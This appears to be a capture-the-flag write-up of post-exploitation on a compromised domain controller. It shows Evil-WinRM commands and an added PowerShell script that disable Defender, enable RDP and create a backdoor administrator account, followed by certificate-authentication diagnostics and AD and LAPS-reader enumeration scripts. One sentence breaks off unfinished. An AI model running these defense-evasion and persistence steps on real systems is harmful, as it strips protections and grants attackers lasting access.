Beyond


This is the beyond page, where additional post-exploitation enumeration and assessment are conducted as SYSTEM after compromising the target system.

*Evil-WinRM* PS C:\Users\Administrator\Documents> Set-MpPreference -DisableRealtimeMonitoring $true
*Evil-WinRM* PS C:\Users\Administrator\Documents> Set-MpPreference -DisableIOAVProtection $true
*Evil-WinRM* PS C:\Users\Administrator\Documents> Set-MpPreference -DisableScriptScanning 1

Dropping the AV

*Evil-WinRM* PS C:\Users\Administrator\Documents> cmd /c reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f
The operation completed successfully.
 
*Evil-WinRM* PS C:\Users\Administrator\Documents> cmd /c netsh firewall add portopening TCP 3389 "Remote Desktop"
 
IMPORTANT: Command executed successfully.
However, "netsh firewall" is deprecated;
use "netsh advfirewall firewall" instead.
For more information on using "netsh advfirewall firewall" commands
instead of "netsh firewall", see KB article 947709
at https://go.microsoft.com/fwlink/?linkid=121488 .
 
Ok.

RDP enabled

*Evil-WinRM* PS C:\Users\Administrator\Documents> net user adm1n Qwer1234 /ADD ; net localgroup administrators /ADD adm1n
The command completed successfully.
The command completed successfully.
 
*Evil-WinRM* PS C:\Users\Administrator\Documents> net user low_priv Qwer1234 ; net localgroup "Remote Desktop Users" /ADD low_priv
The command completed successfully.
 

Creating both a low-privilege user and an admin user for testing. Note that `net user <name> <password>` without `/ADD` only resets the password of an account that already exists; creating `low_priv` requires `net user low_priv Qwer1234 /ADD` before it can be added to Remote Desktop Users.
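The three steps above (disable Defender, open RDP, create the two test accounts) as one script with verification and cleanup, an added example that is not from the original page or the captured session. It assumes it runs with administrative rights on the domain controller out of the Evil-WinRM session, so the accounts are created through the ActiveDirectory module (New-LocalUser does not work on a DC, which has no local SAM); the account names and the password Qwer1234 are the page's own test values, and the function names are mine.

```powershell
# Added example, not from the original page. Assumes an elevated session on
# the DC with the ActiveDirectory and NetSecurity modules available.
$ErrorActionPreference = 'Stop'
Import-Module ActiveDirectory
$Password = ConvertTo-SecureString 'Qwer1234' -AsPlainText -Force   # page's test password

function Disable-DefenderForTesting {
    # Same three settings as the Set-MpPreference calls above. With Tamper
    # Protection on these calls return without error but take no effect, so
    # the resulting state is read back instead of trusted.
    Set-MpPreference -DisableRealtimeMonitoring $true
    Set-MpPreference -DisableIOAVProtection $true
    Set-MpPreference -DisableScriptScanning $true
    if ((Get-MpComputerStatus).RealTimeProtectionEnabled) {
        throw 'Real-time protection is still on: Tamper Protection is probably enabled'
    }
}

function Enable-RdpForTesting {
    # Same registry value the reg add command sets, plus the built-in rule
    # group instead of the deprecated "netsh firewall add portopening".
    Set-ItemProperty -Path 'HKLM:\SYSTEM\CurrentControlSet\Control\Terminal Server' `
        -Name fDenyTSConnections -Type DWord -Value 0
    Get-NetFirewallRule -DisplayGroup 'Remote Desktop' | Enable-NetFirewallRule
    # netsh equivalent: netsh advfirewall firewall set rule group="remote desktop" new enable=Yes
}

function New-TestAccounts {
    # Both accounts are created explicitly; net user without /ADD only resets
    # a password. On a DC "Administrators" and "Remote Desktop Users" are the
    # domain's built-in groups, which is what net localgroup touched above.
    New-ADUser -Name 'adm1n' -SamAccountName 'adm1n' -AccountPassword $Password -Enabled $true
    Add-ADGroupMember -Identity 'Administrators' -Members 'adm1n'
    New-ADUser -Name 'low_priv' -SamAccountName 'low_priv' -AccountPassword $Password -Enabled $true
    Add-ADGroupMember -Identity 'Remote Desktop Users' -Members 'low_priv'
}

function Test-Setup {
    # Verify the end state rather than trusting "command completed successfully".
    $ts = Get-ItemProperty 'HKLM:\SYSTEM\CurrentControlSet\Control\Terminal Server'
    [pscustomobject]@{
        RdpEnabled         = ($ts.fDenyTSConnections -eq 0)
        RdpRuleEnabled     = @(Get-NetFirewallRule -DisplayGroup 'Remote Desktop' | Where-Object Enabled -eq 'True').Count -gt 0
        AdminMembers       = @(Get-ADGroupMember 'Administrators').SamAccountName
        RdpUserMembers     = @(Get-ADGroupMember 'Remote Desktop Users').SamAccountName
        RealTimeProtection = (Get-MpComputerStatus).RealTimeProtectionEnabled
    }
}

function Remove-TestArtifacts {
    # Undo everything when the assessment is over. These changes are noisy
    # (Defender event 5001 when real-time protection goes off, security events
    # 4720/4732 for the account and group changes) and leave the host exposed.
    Remove-ADUser -Identity 'adm1n' -Confirm:$false
    Remove-ADUser -Identity 'low_priv' -Confirm:$false
    Set-ItemProperty -Path 'HKLM:\SYSTEM\CurrentControlSet\Control\Terminal Server' -Name fDenyTSConnections -Value 1
    Get-NetFirewallRule -DisplayGroup 'Remote Desktop' | Disable-NetFirewallRule
    Set-MpPreference -DisableRealtimeMonitoring $false
    Set-MpPreference -DisableIOAVProtection $false
    Set-MpPreference -DisableScriptScanning $false
}

Disable-DefenderForTesting
Enable-RdpForTesting
New-TestAccounts
Test-Setup | Format-List
# Remove-TestArtifacts   # run at the end of the engagement
```

Test-Setup is the part worth keeping even if the rest is done by hand: the register and firewall checks catch a silently ignored Set-MpPreference or a rule group that does not exist on a localized install, both of which the original commands would report as success.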

Certificate


Issued for Client Authentication

*Evil-WinRM* PS C:\Users\Administrator\Documents> Get-Service -Name "CertSvc"
Cannot find any service with service name 'CertSvc'.
At line:1 char:1
+ Get-Service -Name "CertSvc"
+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~
    + CategoryInfo          : ObjectNotFound: (CertSvc:String) [Get-Service], ServiceCommandException
    + FullyQualifiedErrorId : NoServiceFoundForGivenName,Microsoft.PowerShell.Commands.GetServiceCommand

AD CS is NOT running on the DC host

It’s not even installed. This explains why I was unable to request a TGT for the legacyy user from the KDC with the user’s certificate using tools like certipy or PKINITtools.

If the Domain Controller (DC) host does not have Active Directory Certificate Services (AD CS) installed, yet a user can authenticate to the WinRM service over HTTPS with an issued certificate, the certificate was issued by something other than an enterprise CA on this host. The two authentication paths are also not the same: WinRM certificate authentication never involves the KDC. The WinRM service matches the presented client certificate against its own certificate mapping table (winrm/config/service/certmapping), which stores the account name and password to use for that issuer and subject, so the issuer only has to be trusted by the WinRM host. PKINIT is stricter: the KDC requires the issuing CA to be present in the NTAuth store, the certificate to carry the account's UPN in the Subject Alternative Name (or an explicit altSecurityIdentities mapping on the account), and the DC to hold its own KDC certificate. A certificate that works for WinRM can therefore still be rejected for a TGT request.

Here are a few possible sources of such a certificate:

  1. External Certificate Authority: a CA other than the DC host (e.g., a dedicated enterprise CA on another server, or a public CA) issued the certificates used for WinRM authentication. In this case the DC host does not need AD CS installed.
  2. Third-Party Certificate: the certificate was issued by a third-party CA whose root the DC host trusts.
  3. Custom PKI Solution: the organization runs its own Public Key Infrastructure (PKI) for certificate issuance, and the DC host is configured to trust certificates from it.
  4. Self-Signed Certificate: the certificate is self-signed, generated on the DC host or on the client, and placed in the host's Trusted Root store so that the WinRM mapping accepts it.

WinRM


*Evil-WinRM* PS C:\Users\Administrator\Documents> winrm get winrm/config/Service
Service
    RootSDDL = O:NSG:BAD:P(A;;GA;;;BA)(A;;GR;;;IU)S:P(AU;FA;GA;;;WD)(AU;SA;GXGW;;;WD)
    MaxConcurrentOperations = 4294967295
    MaxConcurrentOperationsPerUser = 1500
    EnumerationTimeoutms = 240000
    MaxConnections = 300
    MaxPacketRetrievalTimeSeconds = 120
    AllowUnencrypted = false
    Auth
        Basic = false
        Kerberos = true
        Negotiate = true
        Certificate = true
        CredSSP = false
        CbtHardeningLevel = Relaxed
    DefaultPorts
        HTTP = 5985
        HTTPS = 5986
    IPv4Filter = *
    IPv6Filter = *
    EnableCompatibilityHttpListener = false
    EnableCompatibilityHttpsListener = false
    CertificateThumbprint
    AllowRemoteAccess = true
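To tell why the same certificate is accepted by WinRM (Certificate = true above) but rejected by the KDC, the following checks walk through the conditions described in the Certificate section: the WinRM listener and certificate mapping, the Client Authentication EKU and UPN SAN on the certificate, whether its issuer is in NTAuth, and whether the DC has a KDC certificate at all. This is an added example, not the page's own commands. It assumes the legacyy PFX is at C:\Users\Administrator\Documents\legacyy.pfx (a placeholder path) and prompts for its password; the function name Test-PkinitReadiness is mine.

```powershell
# Added example, not from the original page. The PFX path is an assumption;
# the password is prompted rather than stored in the script.
$PfxPath = 'C:\Users\Administrator\Documents\legacyy.pfx'

function Test-PkinitReadiness {
    param([string]$Path = $PfxPath)

    $cert = New-Object System.Security.Cryptography.X509Certificates.X509Certificate2(
        $Path, (Read-Host -AsSecureString 'PFX password'))

    # 1. WinRM side: listeners plus the certificate mappings. A mapping ties
    #    Issuer + Subject to a stored account name and password; the KDC is
    #    never consulted, the issuer only has to be trusted by this host.
    $readProps = { $p = @{}; Get-ChildItem $_.PSPath | ForEach-Object { $p[$_.Name] = $_.Value }; [pscustomobject]$p }
    $listeners = Get-ChildItem WSMan:\localhost\Listener | ForEach-Object $readProps
    $mappings  = Get-ChildItem WSMan:\localhost\ClientCertificate | ForEach-Object $readProps

    # 2. Certificate side: PKINIT needs the Client Authentication EKU and, unless
    #    the account has an altSecurityIdentities mapping, the UPN in the SAN.
    $san = $cert.Extensions | Where-Object { $_.Oid.Value -eq '2.5.29.17' }
    $hasClientAuth = [bool]($cert.EnhancedKeyUsageList | Where-Object { $_.ObjectId -eq '1.3.6.1.5.5.7.3.2' })
    $hasUpn = if ($san) { $san.Format($true) -like '*Principal Name=*' } else { $false }

    # 3. Issuer side: walk the chain as far as it goes and look the top of it up
    #    in the local NTAuth cache (the registry mirror of NTAuthCertificates).
    $chain = New-Object System.Security.Cryptography.X509Certificates.X509Chain
    $chain.ChainPolicy.RevocationMode = 'NoCheck'
    $null = $chain.Build($cert)
    $top = ($chain.ChainElements | Select-Object -Last 1).Certificate
    $ntauth = 'HKLM:\SOFTWARE\Microsoft\EnterpriseCertificates\NTAuth\Certificates'
    $issuerInNtAuth = Test-Path (Join-Path $ntauth $top.Thumbprint)

    # 4. KDC side: without a certificate carrying the KDC Authentication EKU in
    #    the DC's machine store, the KDC answers KDC_ERR_PADATA_TYPE_NOSUPP to
    #    every PKINIT attempt, whatever the client certificate looks like.
    $kdcCert = Get-ChildItem Cert:\LocalMachine\My | Where-Object {
        $_.EnhancedKeyUsageList.ObjectId -contains '1.3.6.1.5.2.3.5'
    }

    [pscustomobject]@{
        Subject            = $cert.Subject
        Issuer             = $cert.Issuer
        SelfSigned         = ($cert.Subject -eq $cert.Issuer)
        ClientAuthEku      = $hasClientAuth
        UpnInSan           = $hasUpn
        IssuerInNtAuth     = $issuerInNtAuth
        DcHasKdcCert       = [bool]$kdcCert
        WinRmHttpsListener = [bool]($listeners | Where-Object Transport -eq 'HTTPS')
        WinRmCertMappings  = @($mappings | Select-Object Subject, Issuer, URI, UserName, Enabled)
        PkinitPossible     = ($hasClientAuth -and $hasUpn -and $issuerInNtAuth -and [bool]$kdcCert)
    }
}

Test-PkinitReadiness | Format-List
```

On a host like the one above, with no AD CS and an empty CertificateThumbprint in the service config, DcHasKdcCert and IssuerInNtAuth are expected to come back false while WinRmCertMappings still lists the entry that lets the certificate log in; that combination is the whole explanation for the failed TGT request. The same checks, run against a DC that does have an enterprise CA, will show which of the four conditions is the one actually blocking PKINIT.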

Objects


Servers


These OUs respectively contain the 3 domain computer objects DB01$, DEV01$, and WEB01$. Those are all arbitrary dummy objects.

Staff


Admins


Dev


Interestingly, the user’s certificate isn’t listed here. This is because the certificate that

Groups


Development

HelpDesk (Group)

LAPS_Readers

HelpDesk (OU)
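The OU, computer and group listing shown in the screenshots above, collected in one place, together with the two attributes a practitioner wants next: which user objects actually have a certificate published in userCertificate (the tab that was empty for the user above), and who holds read rights on the legacy LAPS password attribute ms-Mcs-AdmPwd that a group named LAPS_Readers is presumably meant to read. This is an added example, not the page's own output; it assumes the ActiveDirectory module on the DC, the group names from the screenshots, and that LAPS_Readers is granted its access through ACEs on the computer objects (an assumption about this domain, not a fact from the page). Function names are mine.

```powershell
# Added example, not from the original page. Assumes the ActiveDirectory
# module (and its AD: drive) on the DC.
Import-Module ActiveDirectory

function Get-OuTree {
    # One row per OU with the user and computer objects directly beneath it
    Get-ADOrganizationalUnit -Filter * | Sort-Object DistinguishedName | ForEach-Object {
        $dn = $_.DistinguishedName
        [pscustomobject]@{
            OU        = $dn
            Users     = @(Get-ADUser -SearchBase $dn -SearchScope OneLevel -Filter *).SamAccountName
            Computers = @(Get-ADComputer -SearchBase $dn -SearchScope OneLevel -Filter *).SamAccountName
        }
    }
}

function Get-GroupMembers {
    param([string[]]$Group = @('Development', 'HelpDesk', 'LAPS_Readers'))   # groups from the screenshots
    foreach ($g in $Group) {
        [pscustomobject]@{
            Group   = $g
            Members = @(Get-ADGroupMember -Identity $g -Recursive).SamAccountName
        }
    }
}

function Get-PublishedUserCertificates {
    # userCertificate is where an enterprise CA publishes a user's certificate;
    # a certificate that no CA ever published to AD does not appear here.
    Get-ADUser -Filter * -Properties userCertificate | ForEach-Object {
        $subjects = @(foreach ($raw in $_.userCertificate) {
            [System.Security.Cryptography.X509Certificates.X509Certificate2]::new([byte[]]$raw).Subject
        })
        [pscustomobject]@{ User = $_.SamAccountName; PublishedCerts = $subjects.Count; Subjects = $subjects }
    }
}

function Get-LapsPasswordReaders {
    # Legacy LAPS keeps the local admin password in ms-Mcs-AdmPwd. List the
    # principals whose ACE on each computer object reads that attribute.
    $schemaNC = (Get-ADRootDSE).schemaNamingContext
    $attr = Get-ADObject -SearchBase $schemaNC -LDAPFilter '(name=ms-Mcs-AdmPwd)' -Properties schemaIDGUID
    if (-not $attr) { Write-Warning 'ms-Mcs-AdmPwd is not in the schema: legacy LAPS is not deployed'; return }
    $attrGuid = [guid]$attr.schemaIDGUID
    Get-ADComputer -Filter * | ForEach-Object {
        $computer = $_.SamAccountName
        (Get-Acl -Path "AD:\$($_.DistinguishedName)").Access | Where-Object {
            $_.AccessControlType -eq 'Allow' -and (
                ($_.ObjectType -eq $attrGuid -and "$($_.ActiveDirectoryRights)" -match 'ReadProperty|ExtendedRight') -or
                ($_.ObjectType -eq [guid]::Empty -and "$($_.ActiveDirectoryRights)" -match 'GenericAll'))
        } | ForEach-Object {
            [pscustomobject]@{ Computer = $computer; Principal = $_.IdentityReference; Rights = $_.ActiveDirectoryRights; Inherited = $_.IsInherited }
        }
    }
}

Get-OuTree | Format-Table -AutoSize
Get-GroupMembers | Format-Table -AutoSize
Get-PublishedUserCertificates | Format-Table -AutoSize
Get-LapsPasswordReaders | Format-Table -AutoSize
```

Get-LapsPasswordReaders is the check that turns the group name into something verifiable: an inherited ACE for LAPS_Readers on every computer under the Servers OU confirms the group's purpose, while a direct (non-inherited) ACE on a single computer object is the kind of grant worth a second look.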